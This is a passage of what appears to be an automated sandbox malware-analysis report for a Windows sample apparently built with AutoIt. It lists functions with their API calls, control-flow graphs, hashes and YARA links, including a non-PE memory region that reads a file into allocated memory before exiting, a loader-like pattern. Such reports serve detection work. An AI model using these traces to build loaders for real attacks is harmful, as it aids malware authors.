                                                                                  • Part of subcall function 0061039A: CreateFileW.KERNELBASE(00000000,00000000,?,00610704,?,?,00000000,?,00610704,00000000,0000000C), ref: 006103B7
                                                                                • GetLastError.KERNEL32 ref: 0061076F
                                                                                • __dosmaperr.LIBCMT ref: 00610776
                                                                                • GetFileType.KERNELBASE(00000000), ref: 00610782
                                                                                • GetLastError.KERNEL32 ref: 0061078C
                                                                                • __dosmaperr.LIBCMT ref: 00610795
                                                                                • CloseHandle.KERNEL32(00000000), ref: 006107B5
                                                                                • CloseHandle.KERNEL32(?), ref: 006108FF
                                                                                • GetLastError.KERNEL32 ref: 00610931
                                                                                • __dosmaperr.LIBCMT ref: 00610938
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                • String ID: H
                                                                                • API String ID: 4237864984-2852464175
                                                                                • Opcode ID: d9da52d9082221312aa4cbc5f481e600d4c2da53e870eeacb8586744edd160ee
                                                                                • Instruction ID: 1798ea5f7325338798029abd64ce6ef5554c59f3f50ba091bca0b282bdd8ca53
                                                                                • Opcode Fuzzy Hash: d9da52d9082221312aa4cbc5f481e600d4c2da53e870eeacb8586744edd160ee
                                                                                • Instruction Fuzzy Hash: BDA13632A041098FEF19AF68DC51BEE3BA2AF46320F18015DF815AB3D1D7759C92CB91
                                                                                Function 005D344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 005D3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,006A1418,?,005D2E7F,?,?,?,00000000), ref: 005D3A78
                                                                                  • Part of subcall function 005D3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 005D3379
                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 005D356A
                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0061318D
                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 006131CE
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00613210
                                                                                • _wcslen.LIBCMT ref: 00613277
                                                                                • _wcslen.LIBCMT ref: 00613286
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                • API String ID: 98802146-2727554177
                                                                                • Opcode ID: 4e9366e7a7de4f4167abdd054062997253b3e10a1d79ba988c9d7ee14829fce4
                                                                                • Instruction ID: 8242ff6da22076c9baa103c76eae84895858cff74ecb8bb2bf988659163b016e
                                                                                • Opcode Fuzzy Hash: 4e9366e7a7de4f4167abdd054062997253b3e10a1d79ba988c9d7ee14829fce4
                                                                                • Instruction Fuzzy Hash: D471AE714443029EC714EF69DCA58ABBBE9FF86750F40182FF58583260EB74AA48CF52
                                                                                Function 005D2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 005D2B8E
                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 005D2B9D
                                                                                • LoadIconW.USER32(00000063), ref: 005D2BB3
                                                                                • LoadIconW.USER32(000000A4), ref: 005D2BC5
                                                                                • LoadIconW.USER32(000000A2), ref: 005D2BD7
                                                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005D2BEF
                                                                                • RegisterClassExW.USER32(?), ref: 005D2C40
                                                                                  • Part of subcall function 005D2CD4: GetSysColorBrush.USER32(0000000F), ref: 005D2D07
                                                                                  • Part of subcall function 005D2CD4: RegisterClassExW.USER32(00000030), ref: 005D2D31
                                                                                  • Part of subcall function 005D2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005D2D42
                                                                                  • Part of subcall function 005D2CD4: InitCommonControlsEx.COMCTL32(?), ref: 005D2D5F
                                                                                  • Part of subcall function 005D2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005D2D6F
                                                                                  • Part of subcall function 005D2CD4: LoadIconW.USER32(000000A9), ref: 005D2D85
                                                                                  • Part of subcall function 005D2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005D2D94
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                • String ID: #$0$AutoIt v3
                                                                                • API String ID: 423443420-4155596026
                                                                                • Opcode ID: 97b48bc258768ce6bf64ebb1c7ab3b65e3596867caa2393bdefd589cde972e3f
                                                                                • Instruction ID: 18c2268aee73dce6d041230a9f13eb41993d55b765fef6ae60d03cf6059125ac
                                                                                • Opcode Fuzzy Hash: 97b48bc258768ce6bf64ebb1c7ab3b65e3596867caa2393bdefd589cde972e3f
                                                                                • Instruction Fuzzy Hash: 47211A74E00314AFDF10AFA5EC55AA97FF6FB4AB60F00101AE504AA6A0D7B12A40CF90
                                                                                Function 005D3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 443 5d3170-5d3185 444 5d31e5-5d31e7 443->444 445 5d3187-5d318a 443->445 444->445 448 5d31e9 444->448 446 5d318c-5d3193 445->446 447 5d31eb 445->447 449 5d3199-5d319e 446->449 450 5d3265-5d326d PostQuitMessage 446->450 452 612dfb-612e23 call 5d18e2 call 5ee499 447->452 453 5d31f1-5d31f6 447->453 451 5d31d0-5d31d8 DefWindowProcW 448->451 455 5d31a4-5d31a8 449->455 456 612e7c-612e90 call 63bf30 449->456 458 5d3219-5d321b 450->458 457 5d31de-5d31e4 451->457 488 612e28-612e2f 452->488 459 5d321d-5d3244 SetTimer RegisterWindowMessageW 453->459 460 5d31f8-5d31fb 453->460 462 5d31ae-5d31b3 455->462 463 612e68-612e72 call 63c161 455->463 456->458 481 612e96 456->481 458->457 459->458 464 5d3246-5d3251 CreatePopupMenu 459->464 466 5d3201-5d3214 KillTimer call 5d30f2 call 5d3c50 460->466 467 612d9c-612d9f 460->467 471 5d31b9-5d31be 462->471 472 612e4d-612e54 462->472 477 612e77 463->477 464->458 466->458 474 612da1-612da5 467->474 475 612dd7-612df6 MoveWindow 467->475 479 5d31c4-5d31ca 471->479 480 5d3253-5d3263 call 5d326f 471->480 472->451 484 612e5a-612e63 call 630ad7 472->484 482 612da7-612daa 474->482 483 612dc6-612dd2 SetFocus 474->483 475->458 477->458 479->451 479->488 480->458 481->451 482->479 489 612db0-612dc1 call 5d18e2 482->489 483->458 484->451 488->451 492 612e35-612e48 call 5d30f2 call 5d3837 488->492 489->458 492->451
                                                                                APIs
                                                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,005D316A,?,?), ref: 005D31D8
                                                                                • KillTimer.USER32(?,00000001,?,?,?,?,?,005D316A,?,?), ref: 005D3204
                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 005D3227
                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,005D316A,?,?), ref: 005D3232
                                                                                • CreatePopupMenu.USER32 ref: 005D3246
                                                                                • PostQuitMessage.USER32(00000000), ref: 005D3267
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                • String ID: TaskbarCreated
                                                                                • API String ID: 129472671-2362178303
                                                                                • Opcode ID: aca23ec3a5e083c49591c6a6397ac37c1a8bd12a043b1dfe4d39c4fbfd999af2
                                                                                • Instruction ID: 8e81bdae0e3874294409674844df09396b25aaa47e9548416c1085355eca7878
                                                                                • Opcode Fuzzy Hash: aca23ec3a5e083c49591c6a6397ac37c1a8bd12a043b1dfe4d39c4fbfd999af2
                                                                                • Instruction Fuzzy Hash: 3141E639640506AADB342FACDC2D7BA3E1BFB47350F081527F541893A1C6A19E40DBA2
                                                                                Function 005DDFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: D%j$D%j$D%j$D%j$D%jD%j$Variable must be of type 'Object'.
                                                                                • API String ID: 0-1847616689
                                                                                • Opcode ID: 757e005bd2071611ff83f62d3de6d66b5bce2a8fdb2c274d238a8bffc3056527
                                                                                • Instruction ID: 817ae15fc5e84626e83b451858b9db57e6be1dc833380a7c92db72247cab2bd2
                                                                                • Opcode Fuzzy Hash: 757e005bd2071611ff83f62d3de6d66b5bce2a8fdb2c274d238a8bffc3056527
                                                                                • Instruction Fuzzy Hash: 25C2AC70A00615CFCB24EF58D886AADBBB2BF49300F24856BE945AF391D735ED41CB91
                                                                                Function 01A6A5C8 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1009 1a6a5c8-1a6a676 call 1a67f98 1012 1a6a67d-1a6a6a3 call 1a6b4d8 CreateFileW 1009->1012 1015 1a6a6a5 1012->1015 1016 1a6a6aa-1a6a6ba 1012->1016 1017 1a6a7f5-1a6a7f9 1015->1017 1024 1a6a6c1-1a6a6db VirtualAlloc 1016->1024 1025 1a6a6bc 1016->1025 1018 1a6a83b-1a6a83e 1017->1018 1019 1a6a7fb-1a6a7ff 1017->1019 1021 1a6a841-1a6a848 1018->1021 1022 1a6a801-1a6a804 1019->1022 1023 1a6a80b-1a6a80f 1019->1023 1028 1a6a89d-1a6a8b2 1021->1028 1029 1a6a84a-1a6a855 1021->1029 1022->1023 1030 1a6a811-1a6a81b 1023->1030 1031 1a6a81f-1a6a823 1023->1031 1026 1a6a6e2-1a6a6f9 ReadFile 1024->1026 1027 1a6a6dd 1024->1027 1025->1017 1032 1a6a700-1a6a740 VirtualAlloc 1026->1032 1033 1a6a6fb 1026->1033 1027->1017 1036 1a6a8b4-1a6a8bf VirtualFree 1028->1036 1037 1a6a8c2-1a6a8ca 1028->1037 1034 1a6a857 1029->1034 1035 1a6a859-1a6a865 1029->1035 1030->1031 1038 1a6a825-1a6a82f 1031->1038 1039 1a6a833 1031->1039 1040 1a6a747-1a6a762 call 1a6b728 1032->1040 1041 1a6a742 1032->1041 1033->1017 1034->1028 1042 1a6a867-1a6a877 1035->1042 1043 1a6a879-1a6a885 1035->1043 1036->1037 1038->1039 1039->1018 1049 1a6a76d-1a6a777 1040->1049 1041->1017 1045 1a6a89b 1042->1045 1046 1a6a887-1a6a890 1043->1046 1047 1a6a892-1a6a898 1043->1047 1045->1021 1046->1045 1047->1045 1050 1a6a7aa-1a6a7be call 1a6b538 1049->1050 1051 1a6a779-1a6a7a8 call 1a6b728 1049->1051 1056 1a6a7c2-1a6a7c6 1050->1056 1057 1a6a7c0 1050->1057 1051->1049 1059 1a6a7d2-1a6a7d6 1056->1059 1060 1a6a7c8-1a6a7cc CloseHandle 1056->1060 1057->1017 1061 1a6a7e6-1a6a7ef 1059->1061 1062 1a6a7d8-1a6a7e3 VirtualFree 1059->1062 1060->1059 1061->1012 1061->1017 1062->1061
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01A6A699
                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01A6A8BF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1472344836.0000000001A67000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A67000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a67000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFileFreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 204039940-0
                                                                                • Opcode ID: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                                                                                • Instruction ID: d7adbb852d5a2f81670913ce10a0959ab6e3ab619a2da2068b177de1851c45ff
                                                                                • Opcode Fuzzy Hash: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                                                                                • Instruction Fuzzy Hash: 14A11C74E00209EBDB14CFA4C998BEEBBB9FF48704F208559E611BB281D7799A41CF54
                                                                                Function 005D2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1073 5d2c63-5d2cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                APIs
                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 005D2C91
                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 005D2CB2
                                                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,005D1CAD,?), ref: 005D2CC6
                                                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,005D1CAD,?), ref: 005D2CCF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CreateShow
                                                                                • String ID: AutoIt v3$edit
                                                                                • API String ID: 1584632944-3779509399
                                                                                • Opcode ID: cdb45b013b4631ff6e87ed1e6bf0be5e4780afb3ad880d3113f87b4672cd0cd1
                                                                                • Instruction ID: d41378e94a4aa311c1f6d7ad94e5a6d0a8956e32977f049ccdc68ccf9f44d8d5
                                                                                • Opcode Fuzzy Hash: cdb45b013b4631ff6e87ed1e6bf0be5e4780afb3ad880d3113f87b4672cd0cd1
                                                                                • Instruction Fuzzy Hash: FAF0DA765402A07BEB312B17AC08E772EBFD7C7F60F01205AF900EA5A0C6A52850DEB0
                                                                                Function 01A6A348 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1188 1a6a348-1a6a4c0 call 1a67f98 call 1a6a238 CreateFileW 1195 1a6a4c7-1a6a4d7 1188->1195 1196 1a6a4c2 1188->1196 1199 1a6a4de-1a6a4f8 VirtualAlloc 1195->1199 1200 1a6a4d9 1195->1200 1197 1a6a577-1a6a57c 1196->1197 1201 1a6a4fc-1a6a513 ReadFile 1199->1201 1202 1a6a4fa 1199->1202 1200->1197 1203 1a6a517-1a6a551 call 1a6a278 call 1a69238 1201->1203 1204 1a6a515 1201->1204 1202->1197 1209 1a6a553-1a6a568 call 1a6a2c8 1203->1209 1210 1a6a56d-1a6a575 ExitProcess 1203->1210 1204->1197 1209->1210 1210->1197
                                                                                APIs
                                                                                  • Part of subcall function 01A6A238: Sleep.KERNELBASE(000001F4), ref: 01A6A249
                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01A6A4B3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1472344836.0000000001A67000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A67000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a67000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFileSleep
                                                                                • String ID: 01178EZEGL0OKLW9YBL8YPEEIBN1P6
                                                                                • API String ID: 2694422964-3978621138
                                                                                • Opcode ID: 7acae570ae09f24f8b1a857ab526ec89e3b8d0aeb47b513ce85d22bdc7c38276
                                                                                • Instruction ID: 2db59285998a643ca8dceaf93fb4dc47325df2eb85268fe7ff05a5635266c343
                                                                                • Opcode Fuzzy Hash: 7acae570ae09f24f8b1a857ab526ec89e3b8d0aeb47b513ce85d22bdc7c38276
                                                                                • Instruction Fuzzy Hash: 58618430D04288DAEF12DBF8D848BEEBB79AF15304F044199E6487B2C1D7B90B45CB66
                                                                                Function 00642947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1212 642947-6429b9 call 611f50 call 6425d6 call 5efe0b call 5d5722 call 64274e call 5d511f call 5f5232 1227 642a6c-642a73 call 642e66 1212->1227 1228 6429bf-6429c6 call 642e66 1212->1228 1233 642a75-642a77 1227->1233 1234 642a7c 1227->1234 1228->1233 1235 6429cc-642a6a call 5fd583 call 5f4983 call 5f9038 call 5fd583 call 5f9038 * 2 1228->1235 1236 642cb6-642cb7 1233->1236 1238 642a7f-642b3a call 5d50f5 * 8 call 643017 call 5fe5eb 1234->1238 1235->1238 1241 642cd5-642cdb 1236->1241 1277 642b43-642b5e call 642792 1238->1277 1278 642b3c-642b3e 1238->1278 1242 642cf0-642cf6 1241->1242 1243 642cdd-642ced call 5efdcd call 5efe14 1241->1243 1243->1242 1281 642b64-642b6c 1277->1281 1282 642bf0-642bfc call 5fe678 1277->1282 1278->1236 1283 642b74 1281->1283 1284 642b6e-642b72 1281->1284 1289 642c12-642c16 1282->1289 1290 642bfe-642c0d DeleteFileW 1282->1290 1286 642b79-642b97 call 5d50f5 1283->1286 1284->1286 1294 642bc1-642bd7 call 64211d call 5fdbb3 1286->1294 1295 642b99-642b9e 1286->1295 1292 642c91-642ca5 CopyFileW 1289->1292 1293 642c18-642c7e call 6425d6 call 5fd2eb * 2 call 6422ce 1289->1293 1290->1236 1297 642ca7-642cb4 DeleteFileW 1292->1297 1298 642cb9-642ccf DeleteFileW call 642fd8 1292->1298 1293->1298 1317 642c80-642c8f DeleteFileW 1293->1317 1312 642bdc-642be7 1294->1312 1300 642ba1-642bb4 call 6428d2 1295->1300 1297->1236 1303 642cd4 1298->1303 1310 642bb6-642bbf 1300->1310 1303->1241 1310->1294 1312->1281 1314 642bed 1312->1314 1314->1282 1317->1236
                                                                                APIs
                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00642C05
                                                                                • DeleteFileW.KERNEL32(?), ref: 00642C87
                                                                                • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00642C9D
                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00642CAE
                                                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00642CC0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: File$Delete$Copy
                                                                                • String ID:
                                                                                • API String ID: 3226157194-0
                                                                                • Opcode ID: 25c2167395748d5288b4565f5fbcf6786a697bf690bf21efc7d53f88d83aec74
                                                                                • Instruction ID: e923ec9d9936429de03cc282c9dcfaecb72f35fb7ec676fec69b1678ee6b1cf5
                                                                                • Opcode Fuzzy Hash: 25c2167395748d5288b4565f5fbcf6786a697bf690bf21efc7d53f88d83aec74
                                                                                • Instruction Fuzzy Hash: 8FB16171D0011EABDF25DBA4CC99EEE7B7EEF48354F5040A6F609E6241EA309A448F61
                                                                                Function 00605AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1318 605aa9-605ace 1319 605ad0-605ad2 1318->1319 1320 605ad7-605ad9 1318->1320 1321 605ca5-605cb4 call 5f0a8c 1319->1321 1322 605afa-605b1f 1320->1322 1323 605adb-605af5 call 5ff2c6 call 5ff2d9 call 6027ec 1320->1323 1325 605b21-605b24 1322->1325 1326 605b26-605b2c 1322->1326 1323->1321 1325->1326 1329 605b4e-605b53 1325->1329 1330 605b4b 1326->1330 1331 605b2e-605b46 call 5ff2c6 call 5ff2d9 call 6027ec 1326->1331 1334 605b64-605b6d call 60564e 1329->1334 1335 605b55-605b61 call 609424 1329->1335 1330->1329 1363 605c9c-605c9f 1331->1363 1346 605ba8-605bba 1334->1346 1347 605b6f-605b71 1334->1347 1335->1334 1349 605c02-605c23 WriteFile 1346->1349 1350 605bbc-605bc2 1346->1350 1351 605b73-605b78 1347->1351 1352 605b95-605b9e call 60542e 1347->1352 1358 605c25-605c2b GetLastError 1349->1358 1359 605c2e 1349->1359 1354 605bf2-605c00 call 6056c4 1350->1354 1355 605bc4-605bc7 1350->1355 1356 605c6c-605c7e 1351->1356 1357 605b7e-605b8b call 6055e1 1351->1357 1362 605ba3-605ba6 1352->1362 1354->1362 1365 605be2-605bf0 call 605891 1355->1365 1366 605bc9-605bcc 1355->1366 1369 605c80-605c83 1356->1369 1370 605c89-605c99 call 5ff2d9 call 5ff2c6 1356->1370 1371 605b8e-605b90 1357->1371 1358->1359 1364 605c31-605c3c 1359->1364 1362->1371 1376 605ca4 1363->1376 1373 605ca1 1364->1373 1374 605c3e-605c43 1364->1374 1365->1362 1366->1356 1375 605bd2-605be0 call 6057a3 1366->1375 1369->1370 1380 605c85-605c87 1369->1380 1370->1363 1371->1364 1373->1376 1382 605c45-605c4a 1374->1382 1383 605c69 1374->1383 1375->1362 1376->1321 1380->1376 1387 605c60-605c67 call 5ff2a3 1382->1387 1388 605c4c-605c5e call 5ff2d9 call 5ff2c6 1382->1388 1383->1356 1387->1363 1388->1363
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: JO]
                                                                                • API String ID: 0-3765940103
                                                                                • Opcode ID: 5541e94367b20924d37bef0053b5f561889ee93b16767cfa8810d6486d2a109b
                                                                                • Instruction ID: f2e1d0329876f839b2f73def01402b5162ebecb92f999d089e60f11c903dc5b6
                                                                                • Opcode Fuzzy Hash: 5541e94367b20924d37bef0053b5f561889ee93b16767cfa8810d6486d2a109b
                                                                                • Instruction Fuzzy Hash: 6551EE7598060A9FDF29AFA4C849AFFBFBAAF45314F14001AE402A72D1D7759901CF61
                                                                                Function 005D3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
